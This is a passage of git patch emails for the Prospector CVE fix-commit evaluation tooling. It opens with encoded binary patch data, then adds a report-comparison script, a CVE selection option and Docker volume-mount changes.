z)=u_?+Dl9;o(NaDoKVZP+avz3yb^t!%FsG=6$4gKAmiXD(Q?GmUkdnmUh@{9v) zAx%XAih|P_Xk%;AJEhKFN8DTq^?^)ffFiK>>v<(aQcNqvQxC^Uf$0dol?VLy5>zj;lbdmyp0A7aSAC zw9TYg`^2r$Z7Gi6cordCpL;Onb2YcoeckhCu(jQ>N3cY7l|kc%>DH6lU~%4p#K}@@ zc8z(P*EtA7W@^Keh8GBF7(?5;E=JvZIHfn7vGHlrDpFT;@Q?hB2# zc5bAWglLzpVViDTD-xd_W~5MUq>+Z8)ddHH>T8b|f`x9eChacCvxCik81!8-(Z_Tu z;F#zyhliJ8%67;~qh8{rhR%I@h&PfkpQ#cXwi-?v>+l5pPCSC#IGnA&X;E5mba%;E>Fi zBfILs82v&UIT9|f*~X+AqNtwQzVvk9h9_0)e4Av=5fnFrzGmecLHG$fph|CDY2iVt zDZ>w`3uj^YUNaYpv08heM?OnhK@mjKK{5G5O|8lCckc}HPlJexhiPKA44RzQiN>4# zNb+9{Af+e$d)V#W3f}pOgb6i=oOY>c2r3*s!4WH0GIZ9*Z=?Ru_72%9Fw{(Wayt>Q zRr^2L!sQKhvdWve>U34D|8OAL~3JMgw>(&8q6GHE&$#J82+YzEU=ea)a5%Hvwo&U7X7`= z4c#Xow9`TFkBsllbp7Q*Q8=@IF@sd>W&RH=ah$0h+(Ja#*4ITrpiAfL0K=5~it)XR zr+G5t6k%%V!*|{4KYLN)&h;R7&hv!LsQ!ec*B-jg5MAJ}hF*lrl68+9nDhZQ=3a!$VZWAVV$>qUYCxzc!X0zBDavOtfqTKRD zh}yr>_Vqhv-jnSM-4ymQymt;U)2oWz;m3qIw)nBd_dC5&qN!GB8RM@JCkE^)u{my!@46H$ zejoj=YB(g+yQ>X`0mEV}jjol`v*n%cIba4cQBfb{Amnz1#ckhmBGE8)h_($t{io-W zd4|~MoWFOH7BdV=S2n^2q?Ar-nI~e6DSqOs*_VR27Zrm&tq+$XkdAumJUh7m%0&ZX z&R_h)PLH}8aa#cbFMqKUTd#}?aXTbr!FZ~31--0PU<;{_TKOmsvaFq3NPEK>_T*wm z{Q^e{rmQc-HlC^8qXi_Ag8l#>{-n0`t;$95qYjcZXmG~1?`%!+-hkS$ny-6y3{w3u zJvEOncC6u~g>xt~iQWS1#L#IwlBX)JHh3oaRI?#Df@Seq)y5J?(POxqd|v)u1d|EG z{G^*2uBfi7!n!114hvbG(KUH+@%t=K0<0R!rh+RXz!06@{@~yoM{wIm<~M80Of}H6 zEk=aV(6ARFWGmWGx3EP-j2W7n%oD>ve^epy*B3Fp)$5B+7a6D0)BEv;o@A@Y!ZZ`Q z!Q)j0_7THG{T6OZ!GW?AYGme4DZnC*v8EFcEl};q=yHE5zCI5s1l<@L+~m^@kI}&M z$#U-YdlGaGVozV~R#uw?8uogAr9ux9YYF~G%V@2jQ!|0FryIa0SIsi&g0_&+-gdZ} zgCdmt_x2H|PWCm{=wed!&+K%ND$_Uo7dD!e0t1HUSWcV?2kH}=+n9o*6f}0&&o85p zcpQQ|j{eFl1G6oicEmdfoZ-M9B`%T*e7ukZ4RBr6O_Ww0yY#Xcs(=a=YNH%;JY7*c zrSp%{C6P#%--Dscj%G?p&W2=#{~etTLbxvh%NrBe2)wiK032!N17jVb zUe{ed8aitBeCsfX#O>Xa%~=>C^LTQ`thcfNX-^nR4K=2vuw^zmVk#1Z406|EwdstBLt5ep$=P`L z@XJ^OgI;eR^machra|wj$T7`x8qyC?rjzLPPZsHpi8UV_iaBH8j+7-jMTdAO_i+60 zDVi_lJx!8O{dl4BU{U&?-)jTIJcXj8vAgo986WSwL-Rj9Pbd5&d%~HJw;z^sP*=eUW+aL$Ewd3GI0Eu6?#DWMTO^- zL&{G8(fytZYrne#? zH@etQ-9~fsvoyL!cBz4x#Btqr?-Xv!L<}*4rc`gNUhTl)PzCW5)q z{(LCAg<83B1)}F8^~60$V`!Fz_q-A2>>07KbSUX#S4r1@@m!*R+GIj%q<)cMb)pW3IaTqf>mHYZ>}6vvz@G`Jf3_8^-@G{2(?VAwi~_^1vnp79k;R( zc?_D&NYd3`Oj`7uGkghO9eKF`Gy)t%9?yuvti& z%?ekbRphBOIGQP+0h~qtyROj1+|JGKQ%^L~Q5DL0sADM3>dq?uz00afl@SaV<2~IL zqaO6pBH8f9Kguf%0Q@*aIXeNAH_zON%g#Ji<(@FRkpJxWTnqgY z8zrsobN^W9mOoL>ixZlBv;8chw)a{a{?-&@AWomr2zC!qcaby|{>35GcjRlw9LV{&P7= zSs_@)g*=e^4M~`gA?RL3%(I21)+DB5fz3j(JV*E*#Z`HlF@}qfyJsO2m!)kUanc1M z9Vw2!)YYp zZZ1{^TvG2*&ZM%`((obI*p3phYHf0xp8*cyBK-)e{C5A18XoWU;~A9=8CFj-Q*|8R z-Gh*L_m;3>7+!@zHi~wl+(e`f^1L3CF^0f7S{1>E{b@&{`ZZz4oa65}wVdY5qgjZ4 zR&3tD8rqKWns3xk5Eb^vay7b>SP6fYfXH<3gQG;{c97&KF=d3cN`3^03fTg_2PHEX zDv1{aKC3c{1iJYPJgOZ8&BcNE_Mb4=430vi=?c|gPCHcdA@Okj?B)a(gOP^G>qp+n ziS-5hnPFm#=kx>(7xQuD6bp_slK$BXx|tIKT-JiAv=z(o4$b0C{ z{L`EOJunpsoq6oY7Qv@r@`iSomoN*|+5OA+caR#i{%K}_L|1&9XV44$^C$So|9>wO zrVUP#q8n$28#jY#H1UEMuiz|4d@#EHKIA4#;dp^NQm}_drJ;4D*@adUj=3NW3 zRw^Kg7b-dknF(SA+P=(8lXH70MgLw#dMh580aQ~e@QL64#0*XUVTJbs!?#5mwH z%)0aqd)Q=z6pY!3Ck4HsZE*=}Yif5K%~yzr9XXgxxg(w_AwCXpGf!urxT{T>u5d>y zh+@#=tG6SHbsxi#>*Daj`*u(h#vcc;(7DTCm9m#@xa3o45HlNtZ!aawjkki~obdEa z%>MO+;82-aLo%0_Oq1aq_OFJvwk%;uXs+B$7-(MVL?i10Z_QAfD#sI5B6A8q>eXdF$1leny@IB?(i7pvUl z+g}{9I8f~iY%RT04_?b}4jR09GUjx+oJ zSP$@d-px-O4le(p$)d?hlkQq$y<%EEo6&RlEbaVs@lhOWefv46W)bZ^0wzL+GLNM& zC#x(%=M&?|2qaa$!=xu;Dq~#bFQk*@KVJS781%0#{~bw+d!0;&yyI2+x9jw9?W zYbYzjsp7SHc)azX-q0bV@ihC+kN9WT#jXU-p0N9mf3beZf*>%Z0eRPuBsZG2iO2Wl zSMK9S#)Z*Z!~awKrqT*S)f&@}JQOc~29M7B{f{5UTfk*Fi_U=?+R|M4FUPR)2ir}u zQY2}+-iAP+7;aaUkH^OM7z6&&3HiBcmL5g=mJ(#1@z)gv1uhf`mztdmhck`W^z>P% zeFEM#KxghfBCJ-&!0fr}ReMj-Ul46umY8+7O5^Kr@r1t%A#}YHm7Q`NX*J+(>Nv9BLmUEz&`OHu8p;=E4Kv~NJd|$GcyKH zuEzo9Q;Ih6%h`Qoh`4w6)3}BWO{|HxLJQ3cu@Lt+Z;wjZjN;NC&s~FFwN4r-O*u)X z_iB3Pk7{cLMrcWDZ+d|bLYDJ0ffwB8zh6N;@=`jZw{#qJMcyi1zlHvrWtuLnmtxT9 z7vGz}-|GwXly(r|c-eO4D#LXEBX=odv~NZB1j)0n;QNaEH!Jt)&{%_sTB zQY4ISE1Lr?o133X_RrVJgkz^(>#L6aK``tVIl(xR!jR}a1Tg6cYTZp|r2Gn8Aq`ow z!lDk%0!qZQ>x(23!!XRNe867{7Ud_5$A|KQSJAn>FHjpnJXw9t@#=JQ-Yv?XwYKZeS!)BYv=8S>1Vh<}HtugjF2s)eq*=Y2 zJYG@X**JqCjpD0r5{!3`ZM!|w$8xzAp*i412E%@M)3!`An}9RMXKYqTu%+$%3?CNV zrLUq>cq1mAafd8_u6}U4XFdZ5v%Md4Mom=L*)(RA+L!nhbIEax<{UM5OltXAYyYY2 z-P#ENHb$ieq@DE3rczB)b|4RwXH1rrDxf@$UEl64&2M#JOg7Z}a#KgJc_RA;5Ommy zB4tBSjvD*aO!5BpKTN@3+@`Cm!TY{*1+`;PtE%cL^TuVG*Y;uC>|2+jd;(wIQ(E)J z9NZHuuBKP`y#YfBQZwu+`GFz(#l9bNpAINpwJ#?pfyuYbFd&gzn42;z*51Y;(_GH+ zq%C1%PXm0O8R=2^EE?_2^8sr&kRYBv<^H<#7F~!HrB28sPvpWdD23HQecp{z-stPQ zmVSo_aab^rVWW)i!zzecw$H|kQ-j}lGrjw=MNhTRo}uNbI+kz^OL$5jH#rJ4Y?3kc zVXq#hJTRUO6bjR%WeHun1}xf>Nr!;7`@S2IO5I+=x;V##FC_8K^w0%2Ly6-nu`umc zI9(F#Gi3V~JK9}7y?&-_KBSn&`zvQ_Ht*{8iLO0^e4NI~j=5v^iRDpGsx*BdmCY`Z z(G`lf<>~;}Pu4W?>jFtX!)m_h(z{Mu?O=2^Efy!id$$P}mXK;Bp<> z&Z(-x$)3yQa}bLC^eabzB2tLQt8uh_yk3(m4w!Un8^p}1n5Qt;t`b*o`ugs7sU$y; z#BC+k#=U)L^b`uUrUb<_1q!5aQxWP@BJHPU_503BSW;nH9FeF++3C4$X3ZcHv57WS zpk$lyHqgZ9rY{XXi9?VfoA^Fk>h=qHRx{O3AWBz~r$qmS@|7Ksn2BMNf~ZR z;r$HOrfFHJXMDRtTUwOV*@p)jG$~_qFjEB0Q;5f_$B{FNB817*9x&OV5Sl*GHTi+D z;DBGvUhxYkR&@g_3G}%(-t;gIxh-o!!|fzLO~ynbtgE-S1IZnu0~3gZ{1H&|)w{Qy zWG9np6>+yBkgiSA7-=-_BEb;q}X-f2yBJdN7R|UleuF|baeO! zytJxbWQY_>O9vP0I`~bO62{e9H%?@=rjVsCxSf3{G@f-TR)R{w@13c{2L{U0j$A1~ zW6zgg#|gM;ghm4Jzw!kQ<%Dk>)h2RKcjzRjnNbu?fl9v1opOUvv#G%=9*O?7g?oM^ zlB8vNjx}FdZYnzm2V?Vl?g;Ccglfc?i{o}63i!ycu`}ZA9_zNg&q-Jmo7+GbjA~H| z{~6O?5nORnQ04lId>qV|brK~qF^JJ9Q>a!xNQrFwd=)&{=62hsiuiQ8Yp72Yh0ukK z{T3|AFH}WbYtHSMGxNoPskT^K8<6pIt3@j`GcyFSY5-qp4o~P2n)^rv=Vr-8z<$RN zqK4`jr##(=biASQ#~Z2IAIi*g>h^CH- zgV6@V%K55_mevD$1(c3p1>s~OOM#myoR?Quay02LC+)ZmRcUn2c52=rR2G*KnI2Fx zIvs2mxZhjGOn=tl#p7*d`!rx;Uy(96MC@L5{0P(3a`#i@c(TFMY-$Xr=l;^9)e4X^ z&HUVo z9LtET3O*GrN};?yh$JF0CM4XD2&)vQ=;lrp*?A4Vu<0DW!BK#&dJMKpg{4PLGZ4@A ze^0wAm%)6kvlYPI>x&SUtHk2KwAoi6Cx+6GS*F1i)3UWW%v@o}QtEh24UM_nxiIH` zUkTgJmLZ#EvUixo58DAn$Nw(=1_O9+Y-q>we)jg2kqWVSbzJ=gZ*{dM*B`r-DOIJP zmHPhrA;bPH*x5%_N0lGVq9}D_>kLP(+|zj1t)1%<+6T1_o$;BYRq8#3H{rGD zKh@p)JS&hwY~^xq>^Hf7S{hr^ou5U5@D4$BA>m=r_H#BPQ)#xUy1Znij=wbZotiWq zVeOnXY$#)uUdr7~)lS-Oao^LPZxx z6jiz!x@Og0V0*Zlf?F24mYxBc%*`VEA0hY>^KsC^v$rNcXpiM*6Gp6-7x3(}4XFm& zwZDS`xnPlRR2i4Xl8QVt(1)5-Q)j*-!D&ktBR6X~Rp%OQ>u4rSDvf=Y=57@FQ9ur# zHNxIlPB?UpeD+O@ExK#=boruW27I6Q7N`xLA38CS_gMKz1u`O2iX{&8*P(l)i2!uf zeeL{6M}d4dn%*73YCy)ou$G17E->X(bLTf2+7+Ih(DM#-#}IeXF_Q(jAsZYGQe82KyX#?>kb%>;tYPs zc{#xFZ;D|IZ!Q+dy7}9PeQg8K_b}#py0Q9mo8hOVE%smepih&=KUOU=TMKB--1|Yp zAQ$@Y42tPrcUAb%(c0BQ2VR$MFekhqfp6yjEw*l1UrO%7o2Ck_*&d(8{7HGHfS4M) z|LU9+2V<#-du;~qL{ZwD52R{D3GFyt8&|DZ-$ZVpa6wfHV=HnM1Ry$)o zydBN$O2!g?oD$7a5AETZB8{TQ22UM`S=WlbYc+5=56n@cd?97W^wEsEff~JgXzp3y zVjb;+nEQ@XSWQo<6i%s2*`C)aAm6c!9CHVRm`xyf`p$zB_Kk5Z zAn*0mcsgJ5O?SU{Z{t3c4w;)2NrL)g(1>x{10xP+`$LsE`lW2%LIk3`7*9*NkzoMA{8 z7LJnZg72XqZm}UFq>m2tHNQE=lv8Lag!d2KDYQmpHj}A{ALDW2kQ;L(bk5R1>M=zL z{+g~IiH^a`SI_MLQzExhjuM+BuoDBIz?|WIKj*d(h?f935hODo$%+fFIDwjCGL8n3 z@VHXmd~p0ZM*uSAGBO4cSMoevL0Rdq-jV!&Phq2)l6DkeBYe&R$p5?W^&lUwl&SjX zabzI3wZ*C&2TEZ0Sin97Sr0ErX!=uO^o@`g^=2o4rTM2m=>5MJ$Nx3EjQBsEg6b7F%|0D+!n6r1GXRR#Bfl`$u6y2oyGFrCUTUpN8UaMhG0GrQ0GWwY z0aGQtJeqD$-WL&rZgITM7Syv^k5d``wzL&8nL0k0#%Qu+gYwypKWUSd;=+veHIXb7 zTzIecWqrBb#2g*uM~;uOi$K46a~q(Z1X_&`oCxS`Fa4F}$Mz*Iw-^mFl802RX>9uB zC^30n@ZO!Yl{4+3P(+TBIn!g7pdN&El=%BZLvcFhiI~=xWn!JculcWwlD?TZ*?Rc&qllV~L%Gl}yW=)cgN7F0I zdc|d37@nTVQ02OnC5euBHS-7^vsP?Vf&MIlXqw%V#yp#m`5uRdr)1jw^<|@d+PH&* zGp7qD_xbf>D-SE0mlxNi)tR5?&bnxmN%fkZ!IT|0ad=-0_|`l_s)LfJXPfpgx+;^4 z#LLG( z`H1wT5>42l7!u3*We`r>k(zI7Oi<_p{_-6rzmjafR}y*OQL9ZCDbap(YrVumw6>3K z7k5~E5~gQ8jXDOcQQaMySij1%z$KUL4W7o_j#2Q<#lggn7UWAr)t2h(u-T>2nD(|* znd;)}EDCa}jx&s`B_CUop5@50eDY(ghqS3t_`WVX>|X?g9xe-+DEl!Glcf73fxWP> zCztm#GMgdg;lZe{EC+6p3hlVC?tb_6^Xkf6rL7W=V zvle3DN$)I7Y*Qz*_>oX)?ZWI8A}Su3TpI-i$L`G+*fA5M>z%E=j_u#k9(8V4GIiyb z)r!3%dAmiKTbejHLcO@>8k&U1r~`m@rH!4+6i45Tha8VC6g7X5^kYq376EK%?|HZc z4lg~`p3Wsmh2b$$ihRYA=}I1uf)0EPo|yq$SD6_KQ;_E+tG=pKkITioSkpp%jDz&# zNs-rb@7f!8wBC3yfGjK0l3!yB$88z3a9HwO)F^*_z!~uH_kiwM4BS6t2$ znANLF;|q_H5Y%!gdcv7sP_G5&cKmi(lJjt*a)tS@vHT39i-e@yW(d`y`(>k;oRHRm zM|eitq*>f$N-F%&YZVSrOeXJ@Gnd)Kp8n3de?b!do4EuwFr z+_Zs-`MaC|t5qHrvJh!ImWmJD?QPD4EK$C*W((Dn{vXOQfmd>i6<@&QXUZ&su(7fFkD5)}H+M=jhiTD)lMg{P-QgQ$nhg2tVg z=&5`kC^_j#BBkX{-mSYb`>3}*-I=Qmds?lIy{v_cWl(0+#_9pNzDT*>K@>e20Pb94 zEVTNoH$zSZ?(OBagc!`W8L1)|(hWv$n%tc8LZ4pIVs3gOa!D-rPBo=9^9ck50bSAT z(meueoA($~?J%p|LJT@DUo}r=(_v|aV(e!Hh9=`e(d&beOtHEW`wEc284MkouXx8N zQTQ+B9rPv!gCsm0(D5~14j5>{8KV~w_yESL>fWd^ZtNj9?!y>2D|j93*m1|t9gp$+ z9D5UG$$6zC`h24iW~s&U8fh#=4*1443MehVvXfr4FbMn!qId7^DG% zp%(aYZ_@tHNKS1JEKq1Pxs#Ii2ZSm-prT!7A>P0({g}Q z^XEc`^&fjd+ecQiwmV331>_DLQe@YAjwC$9UZX8=cD(NgAF1)peNKrTAnz{E8o`J( z=(pA!h^)qv1tJsTkHHfd->fpM%lhE=UX{L&&VI|b_|d_tm-rfu=ASWlvDZyRgN1p$ z<$c>*hAz%gz&B=*GQ4%_9B%}LF95c?QN+Lh)>tNvXY>9!1$E45>_+KpN*j3FTv%pO z%zn-C!l2A!JM(h>7qlOWhA!-v6Bt^VgCoBz6!?ADb3aKS3DY;8W-#Lm@HW(nGAY;cB zZ0u#Y6Ap*kZRTww@)=hlq{!R==6G z*_Ls;^RpMT%Fa%H2$OriU1Y7Cae|4XM!}8Iv;aqMa=8JgA(sS$Aq|2!&f{bf;Iu0Z>p#8I6-yNuO$H=|50m8Tv=ym2DQIUGNCg4gb7~=4J);~umld&$(!y_LP!TL!pvi-1lZ&y`orT| zJ50Gar1x}+7lR6iUa1K$#0EyMU=`~oZz)H8r1#Kj74Hg!e?cWze~gZo+HHIIJU5au zq20Xa z37%2Nc9tj6o|X>NP&SxKV>w_}ZgLtiic|YVOw3tIta=0H+K{AN8YwI;Q12Sz-p}TH65)qM%BD<52oYk&3nZ>T$V-}+E``rNUmO!kWMt2Q%owxjVxB6 z*(pxH_xQaMy^;}H^TpCieWqO*U0YRCc~$&|`@|FvgViNwCo_>rZ)EKuc~%%}cbueH z!X#g3DIi2^Ai^jtHg>K%xf3)J%oUau{1gH^qqwBc7icTw8S5F2-Y0x`UwFpqb9)Zg zzq&#>yM>A|I)y)KO~p1|E*O*aoicvfpJGqHg5QF5cby^l93^Gj_Zn)_T!Sm(knz2% z|3F(kHpS92VdUrij1hzm2k5QIsbYc$kWBY1GUq?9&?@lzaNWIc_9@?YsP#@vzH1x# zb7^R4@tSvkA*pkHsxrd&EgY2ae?~?_ku@(B4UtMa#N|v~9PZyP@EzjdIU%@wktgYZ z@mpz5>KRP|dtoOZ7|WrD!HJ7c7M1o$hwgxorAdTdp{2<#To4&WO*>fOO5ChTpkG5o zUWjwjH1TWRI?Apc1_n2}4`33;x|Ay==#yKpkSYx$!aVQws3b)9uSw!nZTWl$t)zDf zkA76R%*yF#h6{ktULgZ&k0x$Xy|H8zmuc;8kMB+N^|?qItfy`s%ZV(v1Vt#i{ZOBR zHGC)>TBCTdzfrQB*f`nJm%2iarPDqPGqEw5>b?5tzr_K%EpY4ZUr?4CfR)ZroRP`? zg}?oWmR1eZw<}np>$Ya&8Zjt0Rh2pOVlTe5H6tb?kIe3KA-`5nQos}!Ji$W#1h_gvItI>XBtq!U5C06-l^|*8faLX5G>Zr9*U)`Ylg{zpR}w$oK|NXxkTlJUv=si&W@p z>AS2@R#M9kPHXJU%LW?^0BD7jo;-}cZ@<6QNU(1s4$axvDEw;=uY z_B`0T*vQ*agmN+sjxtxI)>79RC>=`B5%ekCOAllFSR}~3$-i+{A_Pm*(fj#dn|A_plG=ef6R39l361C0W$~Ozxw-VHK1h2Bd9s61)gt# zj3e0}x_ezTDC%8P(CHpt6PNuLZqHnl!OX@KbLgA&;$`(Uq~60d^CUWhGFu}WEi8_} z`5+vd-h@of{#OE35jo+&|7)KPtjpwR)^ThMeR!9%vQmS&iYGaCnqaSY_@Q5`=Wf2m z(;?;JY^^Mw>@F-Jb+BQ<%bJhgl2iAz8#&cp-8j{*kndn@ZRWDq$9MnUwDEh_lf6qP zUQ?9@HrwYnK0bZSAo;iGQ=e|ezez;t%t1l8*~=t${OCiaV)#`m*B@spIh`Sy$sKlNZ59r+jMo>2E%RNLnDsP zkNo($a&Nivn@#GP^TU(|1(%_T!!M z^=9#g+Gihr*;t}?cWqz!{Ea%dceY;@oM*G*W9XlX>f6s<+A9LfURr;vtL=(kWxDkK zng}z$&p+$;%yI1Katuxbu9SN(DmF{~Kv>1m{V|U|>AS_eHed8^{rXFPdWHU$u6uU- z@wE+lSJwm{sZej%uKc#cKAhW=iCgiA{8W*cr Date: Wed, 14 Aug 2024 09:04:43 +0000 Subject: [PATCH 103/130] [ADD] adds script to compare differently classified reports --- prospector/evaluation/compare_reports.py | 133 +++++++++++++++++++++++ prospector/evaluation/dispatch_jobs.py | 2 +- 2 files changed, 134 insertions(+), 1 deletion(-) create mode 100644 prospector/evaluation/compare_reports.py diff --git a/prospector/evaluation/compare_reports.py b/prospector/evaluation/compare_reports.py new file mode 100644 index 000000000..f52afd39e --- /dev/null +++ b/prospector/evaluation/compare_reports.py @@ -0,0 +1,133 @@ +# This script compares the reports of the same CVEs for two different batches +# of reports. It uses the flow-analysis.json file generated by the analysis.py +# file to have a list of CVEs that are classified differently in both batches. + + +from collections import Counter +from evaluation.utils import ( + ANALYSIS_RESULTS_PATH, + logger, + config, + load_json_file, +) + + +def process_cve(cve, from_category, to_category): + is_diff_order = False + is_same_rules = False + # Find Matteo's code report and my report + try: + matteo_report = load_json_file( + f"../../../data/prospector_reports/matteo_reports/{cve}.json" + ) + my_report = load_json_file( + f"../../../data/prospector_reports/reports_without_llm_mvi/{cve}.json" + ) + + except Exception as e: + # print(f"Couldn't open a report: {e}") + pass + + # Get lists of the candidates + matteo_candidate_list = [ + commit["commit_id"] for commit in matteo_report["commits"] + ] + + my_candidate_list = [commit["commit_id"] for commit in my_report["commits"]] + + if _same_elements(matteo_candidate_list, my_candidate_list): + print(f"Processing: {cve}, from {from_category} to {to_category}") + print(f"Same ranked candidates for {cve}") + # Are they also ordered the same? + if matteo_candidate_list != my_candidate_list: + print(f"Same candidates, but ranked differently!") + + is_diff_order = True + print("---") + + # They are not the same candidates, the reports found different candidates + else: + # Do the first 10 candidates match the same rules? + matteo_relevance_scores = [ + sum([rule["relevance"] for rule in commit["matched_rules"]]) + for commit in matteo_report["commits"][:10] + ] + my_relevance_scores = [ + sum([rule["relevance"] for rule in commit["matched_rules"]]) + for commit in my_report["commits"][:10] + ] + if matteo_relevance_scores == my_relevance_scores: + print(f"Processing: {cve}, from {from_category} to {to_category}") + print( + f"First ten candidates have equal relevances for {cve}: {my_relevance_scores}" + ) + # print(f"Candidates Matteo: {matteo_candidate_list[:10]}") + is_same_rules = True + print("---") + # print(f"Candidates Me: {my_candidate_list[:10]}") + + else: + num_same, list_different = _count_same_elements( + matteo_candidate_list, my_candidate_list + ) + # print(f"{num_same} candidates are the same: {list_different}") + # print(f"{num_same} candidates are the same.") + + return is_diff_order, is_same_rules + + +def _same_elements(list1: list, list2: list): + set1 = set(list1) + set2 = set(list2) + + # Check if one set is a subset of the other + return set1.issubset(set2) or set2.issubset(set1) + + +def _count_same_elements(list1, list2): + num_different = len(set(list1) & set(list2)) + + min_length = min(len(list1), len(list2)) + + result = [] + for i in range(min_length): + if list1[i] == list2[i]: + result.append("S") + else: + result.append("D") + + return num_different, result + + +def main(): + # Get all the different CVEs from the flow analysis + flow_analysis_data = load_json_file( + "evaluation/data/results/summary_execution/flow-analysis.json" + ) + different_candidate_order = [] + different_candidates_matching_same_rules = [] + # Iterate through these CVEs + for outer_key, outer_value in flow_analysis_data.items(): + for inner_key, cve_list in outer_value.items(): + for cve in cve_list: + try: + is_diff_order, is_same_rules = process_cve( + cve, outer_key, inner_key + ) + if is_diff_order: + different_candidate_order.append(cve) + if is_same_rules: + different_candidates_matching_same_rules.append(cve) + except: + continue + + print( + f"Same candidates, but differently ordered: {different_candidate_order}" + ) + print( + f"Different candidates, but equivalent relevance score in first 10 candidates: {different_candidate_order}" + ) + + +if __name__ == "__main__": + main() diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index 780a73331..f5c9e9662 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -23,7 +23,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): """Dispatches jobs to the queue.""" dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") - dataset = dataset[200:300] # done 0-100, + # dataset = dataset[200:300] # done 0-100, # Only run a subset of CVEs if the user supplied a selected set if len(selected_cves) != 0: From ff9591f4fc2ad18bf60bb8e03070b43a7dfe6881 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 14 Aug 2024 09:23:42 +0000 Subject: [PATCH 104/130] [ADD] options to select certain CVEs for analysis --- prospector/evaluation/analyse.py | 7 ++++++- prospector/evaluation/main.py | 2 +- 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index f28bc0fd0..c15ccc49c 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -97,12 +97,14 @@ def _choose_strong_rules( ] -def analyse_prospector_reports(filename: str): +def analyse_prospector_reports(filename: str, selected_cves: str): """Analyses Prospector reports. Creates the summary_execution_results table.""" file = INPUT_DATA_PATH + filename + ".csv" dataset = load_dataset(file) # dataset = dataset[:100] # Actual line number in D53.csv -2 # dataset = dataset[198:199] # Actual line number in D53.csv -2 + if len(selected_cves) != 0: + dataset = [c for c in dataset if c[0] in selected_cves] # Keep track of how many reports were attempted to be analysed attempted_count = 0 @@ -171,6 +173,9 @@ def analyse_prospector_reports(filename: str): logger.debug(f"Couldn't find report for {cve_id}") continue + except Exception as e: + logger.info(f"Error occured for {cve_id}: {e}") + #### Table Data (write to table) table_data = [] diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index 251d316c3..3b49a1b18 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -120,7 +120,7 @@ def main(argv): analyse_category_flows_no_mutual_exclusion() # analysis of Prospector reports else: - analyse_prospector_reports(args.input) + analyse_prospector_reports(args.input, args.cve) # Remove all jobs from the queue elif args.empty_queue and not args.execute and not args.stats: From aa76ef093ad97f207f211cf4586a7a245611e55e Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 14 Aug 2024 12:20:23 +0000 Subject: [PATCH 105/130] [FIX] mounts the code into the container instead of copying, so that changes on the host happen in the container as well --- prospector/docker-compose.yml | 1 + prospector/docker/Dockerfile | 3 ++- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/prospector/docker-compose.yml b/prospector/docker-compose.yml index a54bfed52..7910bc861 100644 --- a/prospector/docker-compose.yml +++ b/prospector/docker-compose.yml @@ -28,6 +28,7 @@ services: context: . dockerfile: docker/worker/Dockerfile volumes: + - ./:/app - ./data_sources/reports:/app/data_sources/reports - ./evaluation/data/reports/:/app/evaluation/data/reports - ./../../../data/gitcache:/tmp/gitcache diff --git a/prospector/docker/Dockerfile b/prospector/docker/Dockerfile index 05f47adda..c65ad74a1 100644 --- a/prospector/docker/Dockerfile +++ b/prospector/docker/Dockerfile @@ -1,6 +1,7 @@ FROM python:3.10-slim -COPY . /app +RUN mkdir -p /app +COPY ./requirements.txt /app/ WORKDIR /app RUN pip install --upgrade pip RUN apt update && apt install -y --no-install-recommends gcc g++ libffi-dev python3-dev libpq-dev git curl From 9afd5ee8ce5379792674170bce95e47205298e33 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 14 Aug 2024 12:21:32 +0000 Subject: [PATCH 106/130] [IMP] small code changes --- prospector/evaluation/analyse.py | 52 ++++++++++++++++++++++++++++---- prospector/evaluation/main.py | 4 +-- 2 files changed, 48 insertions(+), 8 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index c15ccc49c..84229e39f 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -1,5 +1,4 @@ from collections import defaultdict -import csv from datetime import datetime import json import os @@ -23,11 +22,13 @@ # The number of top commits to consider for 'high confidence' classification NUM_TOP_COMMITS = 10 -cc_rule_as_strong_rule = True +cc_rule_as_strong_rule = False # Whether to use the old rule names (old: COMMIT_IN_REFERENCE, # CVE_ID_IN_MESSAGE, CVE_ID_IN_LINKED_ISSUE, CROSS_REFERENCED_JIRA_LINK, # CROSS_REFERENCED_GH_LINK) -use_old_rule_names = True if "matteo" in PROSPECTOR_REPORT_PATH else False +use_old_rule_names = ( + True if "matteo_reports" in PROSPECTOR_REPORT_PATH else False +) def _choose_strong_rules( @@ -175,6 +176,7 @@ def analyse_prospector_reports(filename: str, selected_cves: str): except Exception as e: logger.info(f"Error occured for {cve_id}: {e}") + continue #### Table Data (write to table) table_data = [] @@ -382,6 +384,7 @@ def count_existing_reports(data_filepath): dataset = load_dataset(file) missing_reports = [] + generated_reports = [] print(f"Counting reports in {PROSPECTOR_REPORT_PATH}") @@ -389,7 +392,7 @@ def count_existing_reports(data_filepath): cve_id = record[0] if os.path.isfile(f"{PROSPECTOR_REPORT_PATH}/{cve_id}.json"): - continue + generated_reports.append(cve_id) else: missing_reports.append(cve_id) @@ -397,6 +400,8 @@ def count_existing_reports(data_filepath): f"There are {len(dataset) - len(missing_reports)} reports. Reports are missing for {len(missing_reports)} CVEs: {missing_reports}" ) + # print(*generated_reports, sep=",") + def analyse_category_flows(): """Analyse which CVEs changed category in different executions given two @@ -409,15 +414,21 @@ def analyse_category_flows(): """ data1 = load_json_file(COMPARE_DIRECTORY_1) data2 = load_json_file(COMPARE_DIRECTORY_2) + print(f"Comparing {COMPARE_DIRECTORY_1} with {COMPARE_DIRECTORY_2}") transitions = defaultdict(lambda: defaultdict(list)) results1 = _create_cve_to_category_mapping( data1["summary_execution_details"][-1]["results"] ) + # Add missing reports to results dict + for cve in data1["summary_execution_details"][-1]["missing"]: + results1[cve] = "missing" results2 = _create_cve_to_category_mapping( data2["summary_execution_details"][-1]["results"] ) + for cve in data2["summary_execution_details"][-1]["missing"]: + results2[cve] = "missing" for cve, category in results1.items(): 